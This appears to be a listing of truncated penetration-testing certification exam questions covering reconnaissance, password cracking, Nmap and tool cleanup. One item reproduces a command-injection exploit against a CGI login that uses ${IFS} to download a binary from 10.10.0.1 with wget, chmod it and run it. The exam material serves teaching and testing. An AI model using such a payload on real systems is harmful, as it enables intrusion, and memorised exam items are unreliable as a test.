Which of the following BEST explains what occurred?
During a web application test, a penetration tester was able to navigate to https://company.com and view all links on the web page. After manually reviewing the pages, the tester used a web scanner to automate the search for vulnerabilities. When returning to the web application, the following message appeared in...
Which of the following would allow the consultant to retrieve email addresses for technical and billing contacts quickly, without triggering any of the client’s cybersecurity tools?
During a penetration-testing engagement, a consultant performs reconnaissance of a client to identify potential targets for a phishing campaign. Which of the following would allow the consultant to retrieve email addresses for technical and billing contacts quickly, without triggering any of the client’s cybersecurity tools? (Choose two.) A. Scraping social...
Which of the following should the tester be sure to remove from the system?
A penetration tester is cleaning up and covering tracks at the conclusion of a penetration test. Which of the following should the tester be sure to remove from the system? (Choose two.) A. Spawned shells B. Created user accounts C. Server logs D. Administrator accounts E. Reboot system F. ARP...
Which of the following tools will the tester most likely use NEXT?
A penetration tester runs the unshadow command on a machine. Which of the following tools will the tester most likely use NEXT? A. John the Ripper B. Hydra C. Mimikatz D. Cain and Abel Answer: A Explanation: Reference: https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/
exploit += “/cgi-bin/index.cgi?
A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized: exploit = "POST " exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${IFS}./apache'%0A%27&loginUser=a&Pwd=a" exploit += "HTTP/1.1" Which of the following commands should the penetration tester run post-engagement? A. ...
When planning a penetration-testing effort, clearly expressing the rules surrounding the optimal time of day for test execution is important because:
When planning a penetration-testing effort, clearly expressing the rules surrounding the optimal time of day for test execution is important because: A. security compliance regulations or laws may be violated. B. testing can make detecting actual APT more challenging. C. testing adds to the workload of defensive cyber- and threat-hunting...
Which of the following describes the reason why a penetration tester would run the command sdelete mimikatz. * on a Windows server that the tester compromised?
Which of the following describes the reason why a penetration tester would run the command sdelete mimikatz. * on a Windows server that the tester compromised? A. To remove hash-cracking registry entries B. To remove the tester-created Mimikatz account C. To remove tools from the server D. To remove a...
Which of the following commands generated the results above and will transform them into a list of active hosts for further analysis?
A penetration tester conducted a discovery scan that generated the following: Which of the following commands generated the results above and will transform them into a list of active hosts for further analysis? A. nmap -oG list.txt 192.168.0.1-254 , sort B. nmap -sn 192.168.0.1-254 , grep "Nmap scan" | awk...
Which of the following OSs is the target MOST likely running?
A penetration tester receives the following results from an Nmap scan: Which of the following OSs is the target MOST likely running? A. CentOS B. Arch Linux C. Windows Server D. Ubuntu Answer: C
Which of the following would allow the security professional to easily and programmatically manipulate the TCP header length and checksum using arbitrary numbers and to observe how the proprietary service responds?
A security professional wants to test an IoT device by sending an invalid packet to a proprietary service listening on TCP port 3011. Which of the following would allow the security professional to easily and programmatically manipulate the TCP header length and checksum using arbitrary numbers and to observe how...